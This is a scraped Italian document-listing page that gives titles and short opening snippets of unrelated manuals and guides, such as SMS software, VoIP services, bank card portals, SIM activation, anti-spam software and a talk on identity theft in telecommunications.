MANUALE SOFTWARE ISTRUZIONI PER L UTENTE PAGINA 2 Indice Capitolo 1: Come muoversi all interno del programma 3 1.1 Inserimento di un nuovo sms 4 1.2 Rubrica 4 1.3 Ricarica credito 5 PAGINA 3 Capitolo 1:
DettagliVoIP e. via SOLUZIONI E INNOVAZIONE PER LA COMUNICAZIONE
VoIP e via SOLUZIONI E INNOVAZIONE PER LA COMUNICAZIONE VoIP è Voice over IP (Voce tramite protocollo Internet), acronimo VoIP, è una tecnologia che rende possibile effettuare una conversazione telefonica
DettagliInstallazione di TeamLab su un server locale
Informazioni sulla versione server express di TeamLab La versione server express di TeamLab è una versione del portale progettata specialmente per quelli che hanno deciso di installare e configurare TeamLab
DettagliMobile Payment Solutions
Mobile Payment Solutions 1 Mobile Payment Solutions MOBISCUBE ha progettato e sviluppato complete soluzioni di pagamento mobile per segmenti di business verticali nelle seguenti aree: Tutte le soluzioni,
DettagliPRODUZIONE PAGELLE IN FORMATO PDF
Requisiti minimi: PRODUZIONE, FIRMA E PUBBLICAZIONE DELLA PAGELLA ELETTRONICA CON ALUNNI WINDOWS PRODUZIONE PAGELLE IN FORMATO PDF Argo Alunni Windows aggiornato alla versione più recente. Adobe PDF CREATOR,
DettagliColloquio di vendita GRUPPO TELECOM ITALIA. La gioia di vendere
Colloquio di vendita GRUPPO TELECOM ITALIA La gioia di vendere PRESENTAZIONE PERSONALE Voce alta, contatto visivo positivo e stretta di mano energetica. Buon giorno sono.. di Telecom Italia Ho un appuntamento
DettagliCOMUNE DI PADOVA SETTORE SERVIZI SCOLASTICI
AI GENITORI DI. SCUOLA:. CLASSE:.. Oggetto: Servizio prenotazione mensa scolastica a.s. 2015/16. A partire dal 01/10/2015 il pasto per Vostro figlio risulterà prenotato automaticamente ad ogni rientro
DettagliMANUALE PARCELLA FACILE PLUS INDICE
MANUALE PARCELLA FACILE PLUS INDICE Gestione Archivi 2 Configurazioni iniziali 3 Anagrafiche 4 Creazione prestazioni e distinta base 7 Documenti 9 Agenda lavori 12 Statistiche 13 GESTIONE ARCHIVI Nella
DettagliDropbox di classe. É un servizio internet fornito gratuitamente (funzioni base).
Dropbox di classe Lo scopo del servizio Dropbox di classe è quello di far conoscere ai docenti del nostro istituto il funzionamento di un sistema di Cloud Storage, pronto e facile da usare, per esplorare
DettagliManuale d'uso del Connection Manager
Manuale d'uso del Connection Manager Edizione 1.0 2 Indice Informazioni sull'applicazione Gestione connessioni 3 Operazioni preliminari 3 Aprire l'applicazione Gestione connessioni 3 Visualizzare lo stato
DettagliSoftware di parcellazione per commercialisti Ver. 1.0.3 [10/09/2015] Manuale d uso [del 10/09/2015]
Software di parcellazione per commercialisti Ver. 1.0.3 [10/09/2015] Manuale d uso [del 10/09/2015] Realizzato e distribuito da LeggeraSoft Sommario Introduzione... 2 Guida all installazione... 2 Login...
DettagliGuida all utilizzo dell Area Riservata BperCard per le carte di credito. PRIVATI
Guida all utilizzo dell Area Riservata BperCard per le carte di credito. PRIVATI Indice COSA PUOI FARE NELL AREA RISERVATA PRIVATI 3 ISCRIVITI 4 ACCEDI 8 HOME AREA RISERVATA 9 INFORMAZIONI PRINCIPALI 10
DettagliFRANCESCO MARINO - TELECOMUNICAZIONI
Classe: Data Gruppo: Alunni assenti Al termine di questa esercitazione ciascun alunno dovrà essere in grado di installare, configurare e utilizzare Microsoft Fax in Windows 95, 98 o Me. Le fasi di installazione
DettagliBcsWeb 3.0. Manuale utente. Rev. 3 (luglio 2012)
BcsWeb 3.0 Manuale utente Rev. 3 (luglio 2012) Alceo Servizi di telematica Santa Croce, 917 30135 Venezia Tel. +39 0415246480 Fax +39 0415246491 www.alceo.com Sommario 1. INTRODUZIONE 3 Convenzioni utilizzate
DettagliIIW DATABASE ISTRUZIONI
IIW DATABASE ISTRUZIONI CREAZIONE DELL'INDIRIZZO GMAIL Puoi creare un indirizzo gmail (account Google) facendo clic sul pulsante Crea il tuo account Google in qualsiasi pagina di accesso a Google. Ti si
Dettaglidb contocarta. Guida all uso. Come utilizzare la tua nuova carta prepagata ricaricabile.
db contocarta. Guida all uso. Come utilizzare la tua nuova carta prepagata ricaricabile. db contocarta: le caratteristiche. db contocarta è il nuovo prodotto di Deutsche Bank che ti permette di accedere
DettagliPENTASYSTEM è una società relativamente giovane che opera nella distribuzione di servizi telematici e
PENTASYSTEM è una società relativamente giovane che opera nella distribuzione di servizi telematici e contrariamente alla giovane età della società, il team di PENTASYSTEM è costituito da un management
DettagliIl tuo manuale d'uso. F-SECURE MOBILE SECURITY 6 FOR ANDROID http://it.yourpdfguides.com/dref/2859489
Può anche leggere le raccomandazioni fatte nel manuale d uso, nel manuale tecnico o nella guida di installazione di F-SECURE MOBILE SECURITY 6 FOR ANDROID. Troverà le risposte a tutte sue domande sul manuale
DettagliSommario Prefazione... xiii Diventa esperto in sicurezza... xiii Capitolo 1... 1 Codici nocivi... 1
Sommario Prefazione... xiii Diventa esperto in sicurezza... xiii A chi è rivolto questo libro... xiii Una verità scomoda... xiv Il punto della situazione... xv Gli hacker e l hacking... xvii Distinzione
DettagliATTIVAZIONE E RICARICA
Roma, 26 novembre 2007 1 Rendere più semplice la vita delle persone grazie a servizi innovativi, facili e convenienti. E questo l obiettivo per cui nasce Poste Mobile, la nuova società con la quale il
DettagliGuida di Pro Spam Remove
Guida di Pro Spam Remove 1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 4) FILTRO 5) ARCHIVIO E-MAIL 6) NOTE CONCLUSIVE 1) SOMMARIO Pro Spam Remove è un software che si occupa di bloccare tutto lo
DettagliMANUALE D'USO DEL PROGRAMMA IMMOBIPHONE
1/6 MANUALE D'USO DEL PROGRAMMA IMMOBIPHONE Per prima cosa si ringrazia per aver scelto ImmobiPhone e per aver dato fiducia al suo autore. Il presente documento istruisce l'utilizzatore sull'uso del programma
DettagliGuida alla attivazione delle SIM per il progetto ParticipAct
Guida alla attivazione delle SIM per il progetto ParticipAct Attivazione delle SIM L attivazione delle SIM TIM fornite per il progetto ParticipAct è in quattro passi: 1. Disattivazione del traffico dati
DettagliRisparmio Postale Online Istruzioni operative
Istruzioni Operative RPOL Ed. Febbraio 2015 Risparmio Postale Online Istruzioni operative Poste Italiane S.p.A. - Società con socio unico Patrimonio BancoPosta 1 di 7 Caratteristiche del servizio... 3
DettagliE173 Pronti, partenza... online!
Chiavetta Internet Veloce E173 Pronti, partenza... online! Per contattarci chiama il Supporto Tecnico Gratuito al numero verde 800.17.97.97 (aperto dal lunedì al sabato, dalle 8 alle 24). Ottobre 2010-0MGU20100010
DettagliIl Furto d identità nelle Telecomunicazioni
Il Furto d identità nelle Telecomunicazioni Aspetti di prevenzione e investigazione Un caso di studio Trento - Febbraio 2014 1 Il Furto d Identità nella Società Phishing: tecnica che utilizza prevalentemente
DettagliProteggi gli account personali
con la collaborazione di Proteggi gli account personali Pensi che il PHISHING sia solo un tipo di pesca? Pensi che i COOKIE siano solo biscotti? Pensi che un VIRUS sia solo un raffreddore? Proteggi gli
DettagliE-mail: inserisci un indirizzo di posta elettronica attiva, a cui invieremo tutte le comunicazioni.
Per registrarsi: è necessario compilare le informazioni sotto indicate. Nome Utente: inserisci il nome con cui vuoi accedere al portale (ad esempio MARIO ROSSI ). Puoi anche scrivere un nome diverso da
DettagliManuale utente del Servizio BIS.
Manuale utente del Servizio BIS. BIS 1. IL SERVIZIO BIS 1.1 Le due SIM Il servizio è attivabile su un abbonamento voce oppure su una ricaricabile Vodafone (contestualmente all attivazione o su SIM già
DettagliGUIDA UTENTE PRIMA NOTA SEMPLICE
GUIDA UTENTE PRIMA NOTA SEMPLICE (Vers. 2.0.0) Installazione... 2 Prima esecuzione... 5 Login... 6 Funzionalità... 7 Prima Nota... 8 Registrazione nuovo movimento... 10 Associazione di file all operazione...
Dettagli